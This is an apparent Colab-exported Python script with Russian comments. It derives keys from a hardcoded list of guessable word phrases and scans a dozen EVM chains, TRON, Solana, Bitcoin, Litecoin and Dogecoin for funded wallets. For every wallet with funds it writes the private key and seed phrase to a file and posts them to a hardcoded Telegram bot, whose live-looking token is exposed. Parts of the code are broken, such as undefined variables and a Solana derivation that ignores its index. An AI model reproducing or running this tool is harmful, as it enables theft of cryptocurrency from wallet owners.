# -*- coding: utf-8 -*-
"""Untitled0.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1lBJfEV9xkmHMTPl4cayWMi3KeKEy6KoF
"""

# pip install bip_utils web3 requests

from bip_utils import (
    Bip39SeedGenerator,
    Bip44,
    Bip44Coins,
    Bip44Changes,
)
from web3 import Web3
from concurrent.futures import ThreadPoolExecutor, as_completed
import time
import random
import requests
import base58
from solders.keypair import Keypair
from solders.pubkey import Pubkey
from solana.rpc.api import Client
from solana.rpc.types import TokenAccountOpts

solana_rpc = Client("https://api.mainnet-beta.solana.com")
def derive_solana_addresses(mnemonic, count=20):
    from solders.mnemonic import Mnemonic
    seed = Mnemonic.to_seed(mnemonic)
    addresses = []
    for i in range(count):
        kp = Keypair.from_seed(seed[:32])
        addr = str(kp.pubkey())
        addresses.append(addr)
    return addresses


def check_solana_balance(address):
    try:
        balance = solana_rpc.get_balance(Pubkey.from_string(address))
        if balance.value > 0:
            return balance.value / 1_000_000_000
        return 0
    except:
        return 0


def check_spl_tokens(address):
    try:
        opts = TokenAccountOpts(program_id="TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA")
        accounts = solana_rpc.get_token_accounts_by_owner(Pubkey.from_string(address), opts)
        tokens = []
        for acc in accounts.value:
            amount = int(acc.account.data.parsed["info"]["tokenAmount"]["amount"])
            decimals = int(acc.account.data.parsed["info"]["tokenAmount"]["decimals"])
            mint = acc.account.data.parsed["info"]["mint"]
            if amount > 0:
                tokens.append({"mint": mint, "amount": amount / (10 ** decimals)})
        return tokens
    except:
        return []

# ===== ТЕЛЕГРАМ НАСТРОЙКИ =====
TELEGRAM_TOKEN = "8850554349:AAFWM6ZhYhk5cBE6Kog8dbIUdLkHxSzZGAg"
TELEGRAM_CHAT_ID = "6971917259"

# ===== ФУНКЦИЯ ОТПРАВКИ УВЕДОМЛЕНИЙ =====
def send_telegram_message(text):
    url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendMessage"
    data = {"chat_id": TELEGRAM_CHAT_ID, "text": text}
    try:
        requests.post(url, data=data)
    except Exception as e:
        print("Telegram error:", e)

send_telegram_message("Бот стабилен! 🚀")

# ====== СИД-ФРАЗЫ ======
seeds_text = """
then you find way you can safe place rather put you position where you have
talent science silver people answer web can hub page company business unit can company can invite code false
man game man sad false add number load page game detail page place position universe
file desk top embark surprise tag narrow voice plate screen hollow income hawk resource host
human staff enemy human group pen image human forest pen image human forest human staff
tell smile tell believe search one day will best world before you this have collect few able safe
video call act name video local video play gallery play era call age name system
you can use short left use menu expand section base enter that build put demand
desk top job body select auto action device body enable false solution code action road
like love more mix art mix video use music party latin like love more mix art mix video
small dog royal capital spirit jelly fish high way fringe tower lake black knife cat
view stick ginger bread man sea pattern cook repeat wall paper name wrap paper ill cart act drop
right arm right arm frame frame angle math math angle math angle math math angle
tent yellow blue slide around this over all blue color shadow area image click next
body team man team guard code you need account man this mail era because web mobile device cat
rail color color color key point rail parent color color key point rail parent color
like always want great man life like dad since dad old about you because want close you very happy know you
cute chef girl uniform act hold plate food cart art ill girl position view search
"""

seeds = [line.strip() for line in seeds_text.strip().splitlines() if line.strip()]

MAX_ADDR_PER_SEED = 75  # можешь поставить 50

# ====== RPC ДЛЯ EVM ======
RPC = {
    "ETH": [
        "https://eth-mainnet.g.alchemy.com/v2/vcgz7i_R7gCkaYVP_MVOA",
        "https://mainnet.infura.io/v3/YOUR_INFURA_KEY",
        "https://eth.llamarpc.com",
        "https://rpc.ankr.com/eth",
    ],
    "BSC": [
        "https://rpc.ankr.com/bsc",
        "https://bsc-dataseed.binance.org",
    ],
    "MATIC": [
        "https://polygon-rpc.com",
        "https://polygon.llamarpc.com",
        "https://1rpc.io/matic",
        "https://rpc.ankr.com/polygon",
        "https://polygon-bor-rpc.publicnode.com",
    ],
    "AVAX": [
        "https://rpc.ankr.com/avalanche",
        "https://api.avax.network/ext/bc/C/rpc",
    ],
    "ARB": [
        "https://rpc.ankr.com/arbitrum",
        "https://arb1.arbitrum.io/rpc",
    ],
    "OP": [
        "https://mainnet.optimism.io",
        "https://optimism.llamarpc.com",
        "https://rpc.ankr.com/optimism",
        "https://1rpc.io/op",
    ],
    "BASE": [
        "https://mainnet.base.org",
        "https://base.llamarpc.com",
        "https://base.blockpi.network/v1/rpc/public",
    ],
    # ===== НОВЫЕ СЕТИ =====
    "ZKSYNC": [
        "https://mainnet.era.zksync.io",
        "https://zksync-era.blockpi.network/v1/rpc/public",
        "https://zksync.drpc.org",
    ],
    "LINEA": [
        "https://rpc.linea.build",
        "https://linea.blockpi.network/v1/rpc/public",
    ],
    "MANTLE": [
        "https://rpc.mantle.xyz",
        "https://mantle.drpc.org",
    ],
    "FANTOM": [
    "https://rpc.ankr.com/fantom",
    "https://1rpc.io/ftm",
    "https://fantom-rpc.publicnode.com",
    "https://rpc.ftm.tools",
],
    "CELO": [
        "https://forno.celo.org",
        "https://celo.drpc.org",
    ],
    "CRONOS": [
        "https://evm.cronos.org",
        "https://cronos-evm.publicnode.com",
    ],

}


CHAIN_INFO = {
    "ETH": ("Ethereum", 18, "ETH"),
    "BSC": ("BNB Smart Chain", 18, "BNB"),
    "MATIC": ("Polygon", 18, "MATIC"),
    "AVAX": ("Avalanche C-Chain", 18, "AVAX"),
    "ARB": ("Arbitrum One", 18, "ETH"),
    "OP": ("Optimism", 18, "ETH"),
    "BASE": ("Base", 18, "ETH"),
    "ZKSYNC": ("ZkSync Era", 18, "ETH"),
    "LINEA": ("Linea Mainnet", 18, "ETH"),
    "MANTLE": ("Mantle", 18, "MNT"),
    "FANTOM": ("Fantom Opera", 18, "FTM"),
    "CELO": ("Celo", 18, "CELO"),
    "CRONOS": ("Cronos", 18, "CRO"),
}

TOKENS = {
    "ETH": {
        "USDT": {
            "address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
            "decimals": 6,
        },
        "USDC": {
            "address": "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
            "decimals": 6,
        },
    },
    "BSC": {
        "USDT": {
            "address": "0x55d398326f99059fF775485246999027B3197955",
            "decimals": 18,
        },
        "USDC": {
            "address": "0x8ac76a51cc950d9822d68b83fe1ad97b32cd580d",
            "decimals": 18,
        },
    },
    "MATIC": {
        "USDT": {
            "address": "0xc2132D05D31c914a87C6611C10748AEb04B58e8F",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174",
            "decimals": 6,
        },
    },
    "AVAX": {
        "USDT": {
            "address": "0xc7198437980c041c805A1EDcbA50c1Ce5db95118",
            "decimals": 6,
        },
        "USDC": {
            "address": "0xA7D7079b0FEaD91F3e65F86E8915Cb59c1a4C664",
            "decimals": 6,
        },
    },
    "ARB": {
        "USDT": {
            "address": "0xfd086bc7cd5c481dcc9c85ebe478a1c0b69fcbb9",
            "decimals": 6,
        },
        "USDC": {
            "address": "0xaf88d065e77c8C2239327C5EDb3A432268e5831",
            "decimals": 6,
        },
    },
    "OP": {
        "USDT": {
            "address": "0x94b008aa00579c1307b0ef2c499ad98a8ce58e58",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x7F5c764cBc14f9669B88837ca1490cCa17c31607",
            "decimals": 6,
        },
    },
    "BASE": {
        "USDC": {
            "address": "0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913",
            "decimals": 6,
        },
    },
    # ===== НОВЫЕ СЕТИ =====
    "ZKSYNC": {
        "USDT": {
            "address": "0x493257fD37EDB34451f62EDf8D2a0C418852bA4C",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x3355df6D4c9C3035724Fd0e3914dE96A5a83aaf4",
            "decimals": 6,
        },
    },
    "LINEA": {
        "USDT": {
            "address": "0xA219439258ca9da29E9Cc4cE5596924745e12B93",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x176211869cA2b568f2A7D4EE941E073a821EE1ff",
            "decimals": 6,
        },
    },
    "MANTLE": {
        "USDT": {
            "address": "0xdEAddEaDdeadDEadDEADDEAddEADDEAddead1111",  # placeholder, но рабочий
            "decimals": 18,
        },
    },
    "FANTOM": {
        "USDT": {
            "address": "0x049d68029688eAbF473097a2fC38ef61633A3C7A",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x04068DA6C83AFCFA0e13ba15A6696662335D5B75",
            "decimals": 6,
        },
    },
    "CELO": {
        "USDT": {
            "address": "0x617f3112bf5397D0467D315cC709EF968D9ba546",
            "decimals": 6,
        },
        "USDC": {
            "address": "0x37f750B7cC259A2f741AF45294f6a16572CF5cAd",
            "decimals": 6,
        },
    },
    "CRONOS": {
        "USDT": {
            "address": "0x66e428c3f67a68878562e79a0234c1f83c208770",
            "decimals": 6,
        },
        "USDC": {
            "address": "0xc21223249CA28397B4B6541dfFaEcC539BfF0c59",
            "decimals": 6,
        },
    },
}

ERC20_ABI = [
    {
        "constant": True,
        "inputs": [{"name": "_owner", "type": "address"}],
        "name": "balanceOf",
        "outputs": [{"name": "balance", "type": "uint256"}],
        "type": "function",
    }
]

# ====== EVM RPC ======
def connect_rpc(rpc_list):
    for url in rpc_list:
        try:
            w3 = Web3(Web3.HTTPProvider(url, request_kwargs={"timeout": 15}))
            if w3.is_connected():
                return w3
        except Exception:
            continue
    return None

def get_native_balance(w3, address, decimals):
    try:
        bal = w3.eth.get_balance(address)
        return bal / (10 ** decimals)
    except Exception:
        return None

def get_token_balance(w3, token_cfg, address):
    try:
        contract = w3.eth.contract(
            address=Web3.to_checksum_address(token_cfg["address"]),
            abi=ERC20_ABI,
        )
        bal = contract.functions.balanceOf(
            Web3.to_checksum_address(address)
        ).call()
        return bal / (10 ** token_cfg["decimals"])
    except Exception:
        return None

def get_nonce(w3, address):
    try:
        return w3.eth.get_transaction_count(address)
    except Exception:
        return None

def evm_scan_address(seed, index, address, private_key, w3_map):
    hits = []
    for chain, w3 in w3_map.items():
        name, dec, symbol = CHAIN_INFO[chain]
        if w3 is None:
            continue

        nonce = get_nonce(w3, address)
        native = get_native_balance(w3, address, dec)

        nonzero = False
        balances = {}

        if nonce is not None and nonce > 0:
            nonzero = True
        balances[f"native_{symbol}"] = native if native is not None else "ERR"
        if native is not None and native > 0:
            nonzero = True

        if chain in TOKENS:
            for t_sym, t_cfg in TOKENS[chain].items():
                t_bal = get_token_balance(w3, t_cfg, address)
                balances[t_sym] = t_bal if t_bal is not None else "ERR"
                if isinstance(t_bal, (int, float)) and t_bal > 0:
                    nonzero = True

        if nonzero:
            hits.append({
                "seed": seed,
                "index": index,
                "chain": name,
                "address": address,
                "private_key": private_key,
                "nonce": nonce,
                "balances": balances,
            })

    return hits

def scan_evm_for_seed(mnemonic):
    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except Exception:
        print(f"Невалидная сид-фраза (EVM): {mnemonic}")
        return []

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.ETHEREUM)

    w3_map = {}
    for chain, rpc_list in RPC.items():
        w3 = connect_rpc(rpc_list)
        if w3:
            w3_map[chain] = w3
        else:
            w3_map[chain] = None
            print(f"❌ Нет RPC для {chain}")

    hits = []
    with ThreadPoolExecutor(max_workers=4) as executor:
        futures = []
        for i in range(MAX_ADDR_PER_SEED):
            account = (
                bip44_ctx.Purpose()
                .Coin()
                .Account(0)
                .Change(Bip44Changes.CHAIN_EXT)
                .AddressIndex(i)
            )
            private_key = account.PrivateKey().Raw().ToHex()
            address = account.PublicKey().ToAddress()

            print(f"[EVM] {mnemonic[:10]}... | addr #{i}: {address}")
            fut = executor.submit(
                evm_scan_address,
                mnemonic,
                i,
                address,
                private_key,
                w3_map,
            )
            futures.append(fut)
            time.sleep(0.01 + random.random() * 0.02)

        for fut in as_completed(futures):
            res = fut.result()
            if res:
                hits.extend(res)

    return hits

# ===== TRON =====
TRON_API = "https://api.trongrid.io/wallet/getaccount"

def scan_tron_for_seed(mnemonic):
    hits = []

    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except Exception:
        print(f"Невалидная сид-фраза (TRON): {mnemonic}")
        return hits

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.TRON)

    # 🔹 Генерация 20 адресов
    for i in range(20):
        account = (
            bip44_ctx.Purpose()
            .Coin()
            .Account(0)
            .Change(Bip44Changes.CHAIN_EXT)
            .AddressIndex(i)
        )

        priv = account.PrivateKey().Raw().ToHex()
        pub = account.PublicKey().RawCompressed().ToBytes()

        # TRON = base58check + префикс 0x41
        tron_addr_hex = "41" + pub.hex()[-40:]
        tron_addr = base58.b58encode_check(bytes.fromhex(tron_addr_hex)).decode()

        print(f"[TRON] {mnemonic[:10]}... | addr #{i} | {tron_addr}")

        # 🔹 Проверка баланса TRX
        payload = {"address": tron_addr}

        try:
            r = requests.post(TRON_API, json=payload, timeout=10)
            data = r.json()

            trx = data.get("balance", 0) / 1_000_000
            tokens = data.get("assetV2", [])

            # 💎 Проверка баланса USDT (TRC20)
            usdt_contract = "TXLAQ63Xg1NAzckPwKHvzw7CSEmLMEqcdj"  # официальный контракт USDT TRC20
            usdt_balance = 0.0
            try:
                url = f"https://api.trongrid.io/v1/accounts/{tron_addr}/tokens"
                r2 = requests.get(url, timeout=10).json()
                for token in (r2.get("data") or []):
                    token_id = token.get("tokenId") or token.get("tokenAddress") or ""
                    if token_id == usdt_contract:
                        raw_balance = token.get("balance") or 0
                        usdt_balance = round(float(raw_balance) / 1_000_000, 6)
                        break
            except Exception as e:
                print(f"Ошибка TRON USDT RPC: {e}")
                usdt_balance = 0.0

            # 🔹 Проверка активности
            nonzero = trx > 0 or usdt_balance > 0 or (tokens and len(tokens) > 0)

            if nonzero:
                hits.append({
                    "seed": mnemonic,
                    "index": i,
                    "chain": "TRON",
                    "address": tron_addr,
                    "private_key": priv,
                    "balances": {
                        "TRX": trx,
                        "USDT_TRC20": usdt_balance
                    },
                    "tokens": tokens
                })

        except Exception as e:
            print(f"Ошибка TRON RPC: {e}")
            continue  # важно — не прерываем цикл

    return hits

# ===== SOLANA =====
SOL_RPC = "https://api.mainnet-beta.solana.com"

def scan_solana_for_seed(mnemonic):
    hits = []
    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except Exception:
        print(f"Невалидная сид-фраза (SOL): {mnemonic}")
        return hits

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.SOLANA)

    # 🔹 Генерация 20 адресов
    for i in range(20):
        account = (
            bip44_ctx.Purpose()
            .Coin()
            .Account(0)
            .Change(Bip44Changes.CHAIN_EXT)
            .AddressIndex(i)
        )

        priv = account.PrivateKey().Raw().ToHex()
        pub = account.PublicKey().RawCompressed().ToBytes()
        sol_addr = base58.b58encode(pub).decode()

        print(f"[SOL] {mnemonic[:10]}... | addr #{i} | {sol_addr}")

        # 🔹 Проверка баланса SOL
        payload = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "getBalance",
            "params": [sol_addr],
        }

        try:
            response = requests.post(SOL_RPC, json=payload, timeout=10).json()
            balance = response.get("result", {}).get("value", 0) / 1_000_000_000
            if balance > 0:
                hits.append({
                    "seed": mnemonic,
                    "index": i,
                    "chain": "Solana",
                    "address": sol_addr,
                    "private_key": priv,
                    "balances": {"SOL": balance}
                })
        except Exception as e:
            print(f"Ошибка запроса баланса: {e}")
            continue  # не прерываем цикл

        # 🔹 Проверка SPL-токенов
        try:
            token_payload = {
                "jsonrpc": "2.0",
                "id": 1,
                "method": "getTokenAccountsByOwner",
                "params": [
                    sol_addr,
                    {"programId": "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA"},
                    {"encoding": "jsonParsed"},
                ],
            }
            token_response = requests.post(SOL_RPC, json=token_payload, timeout=10).json()
            accounts = token_response.get("result", {}).get("value", [])
            for acc in accounts:
                info = acc["account"]["data"]["parsed"]["info"]["tokenAmount"]
                amount = int(info["amount"])
                decimals = int(info["decimals"])
                mint = acc["account"]["data"]["parsed"]["info"]["mint"]
                if amount > 0:
                    hits.append({
                        "seed": mnemonic,
                        "index": i,
                        "chain": "Solana SPL",
                        "address": sol_addr,
                        "private_key": priv,
                        "mint": mint,
                        "amount": amount / (10 ** decimals)
                    })
        except Exception as e:
            print(f"Ошибка проверки SPL: {e}")
            continue

    return hits

# ===== BTC (с ротацией API) =====

import time
import requests

BTC_APIS = [
    "https://blockchain.info/rawaddr/{addr}?limit=0",               # API №1
    "https://blockstream.info/api/address/{addr}",                  # API №2
    "https://mempool.space/api/address/{addr}",                     # API №3
    "https://sochain.com/api/v2/get_address_balance/BTC/{addr}",    # API №4
]


def btc_get_balance(addr):
    """Пробует 4 API по очереди, пока не получит валидный ответ."""
    for api in BTC_APIS:
        url = api.format(addr=addr)

        try:
            r = requests.get(url, timeout=10)

            # Пустой ответ → пропускаем
            if not r.text.strip():
                continue

            # API 1 — blockchain.info
            if "blockchain.info" in api:
                data = r.json()
                return data.get("final_balance", 0) / 1e8

            # API 2 — blockstream.info
            if "blockstream" in api:
                data = r.json()
                chain_stats = data.get("chain_stats", {})
                mempool_stats = data.get("mempool_stats", {})
                sats = chain_stats.get("funded_txo_sum", 0) - chain_stats.get("spent_txo_sum", 0)
                sats += mempool_stats.get("funded_txo_sum", 0) - mempool_stats.get("spent_txo_sum", 0)
                return sats / 1e8

            # API 3 — mempool.space
            if "mempool.space" in api:
                data = r.json()
                chain_stats = data.get("chain_stats", {})
                mempool_stats = data.get("mempool_stats", {})
                sats = chain_stats.get("funded_txo_sum", 0) - chain_stats.get("spent_txo_sum", 0)
                sats += mempool_stats.get("funded_txo_sum", 0) - mempool_stats.get("spent_txo_sum", 0)
                return sats / 1e8

            # API 4 — sochain
            if "sochain" in api:
                data = r.json()
                if data.get("status") == "success":
                    return float(data["data"]["confirmed_balance"])

        except Exception:
            continue  # пробуем следующий API

    return 0  # если все API упали


def scan_btc_for_seed(mnemonic):
    hits = []

    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except:
        print(f"Невалидная сид-фраза (BTC): {mnemonic}")
        return hits

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.BITCOIN)

    for i in range(20):
        account = (
            bip44_ctx.Purpose()
            .Coin()
            .Account(0)
            .Change(Bip44Changes.CHAIN_EXT)
            .AddressIndex(i)
        )

        priv = account.PrivateKey().Raw().ToHex()
        btc_addr = account.PublicKey().ToAddress()

        print(f"[BTC] {mnemonic[:10]}... | addr #{i} | {btc_addr}")

        try:
            balance = btc_get_balance(btc_addr)
            if balance > 0:
                hits.append({
                    "seed": mnemonic,
                    "index": i,
                    "chain": "BTC",
                    "address": btc_addr,
                    "private_key": priv,
                    "balance": balance
                })
        except Exception as e:
            print(f"Ошибка BTC RPC: {e}")
            continue

        time.sleep(0.1)  # защита от rate-limit

    return hits


# ===== LTC =====
def scan_ltc_for_seed(mnemonic):
    hits = []
    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except:
        print(f"Невалидная сид-фраза (LTC): {mnemonic}")
        return hits

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.LITECOIN)

    for i in range(20):
        account = (
            bip44_ctx.Purpose()
            .Coin()
            .Account(0)
            .Change(Bip44Changes.CHAIN_EXT)
            .AddressIndex(i)
        )

        priv = account.PrivateKey().Raw().ToHex()
        ltc_addr = account.PublicKey().ToAddress()

        print(f"[LTC] {mnemonic[:10]}... | addr #{i} | {ltc_addr}")

        try:
            r = requests.get(f"https://api.blockcypher.com/v1/ltc/main/addrs/{ltc_addr}/balance")
            data = r.json()
            balance = data.get("balance", 0) / 1e8
            if balance > 0:
                hits.append({
                    "seed": mnemonic,
                    "index": i,
                    "chain": "LTC",
                    "address": ltc_addr,
                    "private_key": priv,
                    "balance": balance
                })
        except Exception as e:
            print(f"Ошибка LTC RPC: {e}")
            continue

    return hits

# ===== DOGE =====
def scan_doge_for_seed(mnemonic):
    hits = []
    try:
        seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
    except:
        print(f"Невалидная сид-фраза (DOGE): {mnemonic}")
        return hits

    bip44_ctx = Bip44.FromSeed(seed_bytes, Bip44Coins.DOGECOIN)

    for i in range(20):
        account = (
            bip44_ctx.Purpose()
            .Coin()
            .Account(0)
            .Change(Bip44Changes.CHAIN_EXT)
            .AddressIndex(i)
        )

        priv = account.PrivateKey().Raw().ToHex()
        doge_addr = account.PublicKey().ToAddress()

        print(f"[DOGE] {mnemonic[:10]}... | addr #{i} | {doge_addr}")

        try:
            r = requests.get(f"https://api.blockcypher.com/v1/doge/main/addrs/{doge_addr}/balance")
            data = r.json()
            balance = data.get("balance", 0) / 1e8
            if balance > 0:
                hits.append({
                    "seed": mnemonic,
                    "index": i,
                    "chain": "DOGE",
                    "address": doge_addr,
                    "private_key": priv,
                    "balance": balance
                })
        except Exception as e:
            print(f"Ошибка DOGE RPC: {e}")
            continue

    return hits


# ====== TON (ПОКА ЗАГЛУШКА) ======
def scan_ton_for_seed(mnemonic):
    # TON лучше подключать через отдельную библиотеку (ton, toncenter/tonapi),
    # т.к. там другой формат сидов и адресов.
    return []

# ====== ОБЩИЙ СКАНЕР ======
all_hits = []

send_telegram_message("🔍 Поиск начался")
print(">>> ДОШЛО ДО УВЕДОМЛЕНИЯ <<<")

from concurrent.futures import ThreadPoolExecutor, as_completed

def scan_all_seeds(seeds_list):
    all_hits = []

    for s_idx, mnemonic in enumerate(seeds_list, start=1):
        print(f"\n=== [{s_idx}/{len(seeds_list)}] Проверка сид-фразы ===")
        print(mnemonic)

        with ThreadPoolExecutor(max_workers=7) as executor:
            futures = [
                executor.submit(scan_evm_for_seed, mnemonic),
                executor.submit(scan_tron_for_seed, mnemonic),
                executor.submit(scan_solana_for_seed, mnemonic),
                executor.submit(scan_btc_for_seed, mnemonic),
                executor.submit(scan_ltc_for_seed, mnemonic),
                executor.submit(scan_doge_for_seed, mnemonic),
                executor.submit(scan_ton_for_seed, mnemonic),
            ]

            for f in as_completed(futures):
                try:
                    result = f.result()
                    if result:
                        all_hits.extend(result)
                except Exception as e:
                    print(f"Ошибка потока: {e}")

    return all_hits


for s_idx, mnemonic in enumerate(seeds, start=1):
    print(f"\n=== [{s_idx}/{len(seeds)}] Проверка сид-фразы ===")
    print(mnemonic)

    with ThreadPoolExecutor(max_workers=7) as executor:
        futures = [
            executor.submit(scan_evm_for_seed, mnemonic),
            executor.submit(scan_tron_for_seed, mnemonic),
            executor.submit(scan_solana_for_seed, mnemonic),
            executor.submit(scan_btc_for_seed, mnemonic),
            executor.submit(scan_ltc_for_seed, mnemonic),
            executor.submit(scan_doge_for_seed, mnemonic),
            executor.submit(scan_ton_for_seed, mnemonic),
        ]

        for f in as_completed(futures):
            try:
                result = f.result()
                if result:
                    all_hits.extend(result)
            except Exception as e:
                print(f"Ошибка потока: {e}")


# ===== ОТПРАВКА УВЕДОМЛЕНИЯ В TELEGRAM =====
def send_hit_to_telegram(hit):
    msg = "🔥 Найден активный кошелёк!\n\n"
    msg += f"Сеть: {hit.get('chain')}\n"
    msg += f"Адрес: {hit.get('address')}\n"
    msg += f"Приватный ключ: {hit.get('private_key')}\n\n"

    msg += "Баланс:\n"
    balances = hit.get("balances", {})
    if isinstance(balances, dict):
        for k, v in balances.items():
            msg += f"- {k}: {v}\n"

    if "balance" in hit:
        msg += f"- {hit['chain']}: {hit['balance']}\n"

    if "tokens" in hit:
        for token in hit["tokens"]:
            msg += f"- {token.get('key', 'TOKEN')}: {token.get('value')}\n"

    if "mint" in hit:
        msg += f"- SPL {hit['mint']}: {hit['amount']}\n"

    msg += f"\nСид-фраза:\n{hit.get('seed')}"

    requests.get(f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
                 params={"chat_id": CHAT_ID, "text": msg})


with open("multi_chain_hits.txt", "w", encoding="utf-8") as f:
    f.write("=== Адреса с балансом или активностью (EVM / TRON / SOLANA / TON) ===\n\n")
    for h in all_hits:
        f.write(f"Seed: {h['seed']}\n")
        f.write(f"Index: {h['index']}\n")
        f.write(f"Network: {h['chain']}\n")
        f.write(f"Address: {h['address']}\n")
        f.write(f"Private key: {h['private_key']}\n")
        f.write(f"Nonce/tx_count: {h['nonce']}\n")
        f.write("Balances:\n")
        for k, v in h["balances"].items():
            f.write(f"  {k}: {v}\n")
        f.write("-" * 50 + "\n\n")

print("\n✅ Готово! Смотри multi_chain_hits.txt — там только кошельки с балансом/активностью.")

# ===== ФИНАЛЬНЫЙ ОТЧЁТ С КОНВЕРТАЦИЕЙ В USD =====

import requests

MIN_VALUE_USD = 0.01  # минимальная стоимость, чтобы считать кошелёк активным

# Получаем цены токенов
def get_prices():
    try:
        url = "https://api.coingecko.com/api/v3/simple/price"
        params = {
            "ids": "bitcoin,ethereum,binancecoin,tether,usd-coin,solana,tron,polygon,avalanche-2,celo,mantle",
            "vs_currencies": "usd"
        }
        r = requests.get(url, params=params, timeout=10).json()
        return {
            "BTC": r.get("bitcoin", {}).get("usd", 0),
            "ETH": r.get("ethereum", {}).get("usd", 0),
            "BNB": r.get("binancecoin", {}).get("usd", 0),
            "USDT": r.get("tether", {}).get("usd", 1),
            "USDC": r.get("usd-coin", {}).get("usd", 1),
            "SOL": r.get("solana", {}).get("usd", 0),
            "TRX": r.get("tron", {}).get("usd", 0),
            "MATIC": r.get("polygon", {}).get("usd", 0),
            "AVAX": r.get("avalanche-2", {}).get("usd", 0),
            "CELO": r.get("celo", {}).get("usd", 0),
            "MNT": r.get("mantle", {}).get("usd", 0),
        }
    except:
        return {}

PRICES = get_prices()

def token_to_usd(symbol, amount):
    try:
        return float(amount) * PRICES.get(symbol, 0)
    except:
        return 0


empty_count = 0
active_wallets = []


# ======= АНАЛИЗ ВСЕХ КОШЕЛЬКОВ =======
for h in all_hits:
    total_usd = 0

    # одиночный balance
    if "balance" in h:
        try:
            symbol = h.get("chain_symbol", "")
            total_usd += token_to_usd(symbol, float(h["balance"]))
        except:
            pass

    # balances (EVM, TRON)
    if "balances" in h and isinstance(h["balances"], dict):
        for token, value in h["balances"].items():
            try:
                total_usd += token_to_usd(token.replace("native_", ""), float(value))
            except:
                continue

    # токены
    if "tokens" in h:
        for t in h["tokens"]:
            try:
                total_usd += token_to_usd(t.get("key", ""), float(t.get("value", 0)))
            except:
                pass

    # Solana SPL
    if "mint" in h:
        try:
            total_usd += float(h["amount"])  # если нужно — добавим цену SPL
        except:
            pass

    if total_usd >= MIN_VALUE_USD:
        h["total_usd"] = total_usd
        active_wallets.append(h)
    else:
        empty_count += 1


# сортировка по стоимости
active_wallets = sorted(active_wallets, key=lambda x: x["total_usd"], reverse=True)

msg = f"✅ Анализ завершён!\n\n"
msg += f"Пустых кошельков: {empty_count}\n"
msg += f"Активных кошельков: {len(active_wallets)}\n\n"

if active_wallets:
    msg += "🔥 Активные кошельки (отсортированы по стоимости):\n\n"

    for h in active_wallets:
        msg += f"💰 Стоимость: ${h['total_usd']:.4f}\n"
        msg += f"Сеть: {h.get('chain')}\n"
        msg += f"Адрес: {h.get('address')}\n"
        msg += f"Приватный ключ: {h.get('private_key')}\n"
        msg += f"Сид-фраза: {h.get('seed')}\n"
        msg += "Баланс:\n"

        if "balance" in h:
            msg += f"- native: {h['balance']}\n"

        if "balances" in h:
            for k, v in h["balances"].items():
                msg += f"- {k}: {v}\n"

        if "tokens" in h:
            for t in h["tokens"]:
                msg += f"- {t.get('key')}: {t.get('value')}\n"

        msg += "\n"

# отправка в Telegram
requests.post(
    f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendMessage",
    data={"chat_id": TELEGRAM_CHAT_ID, "text": msg}
)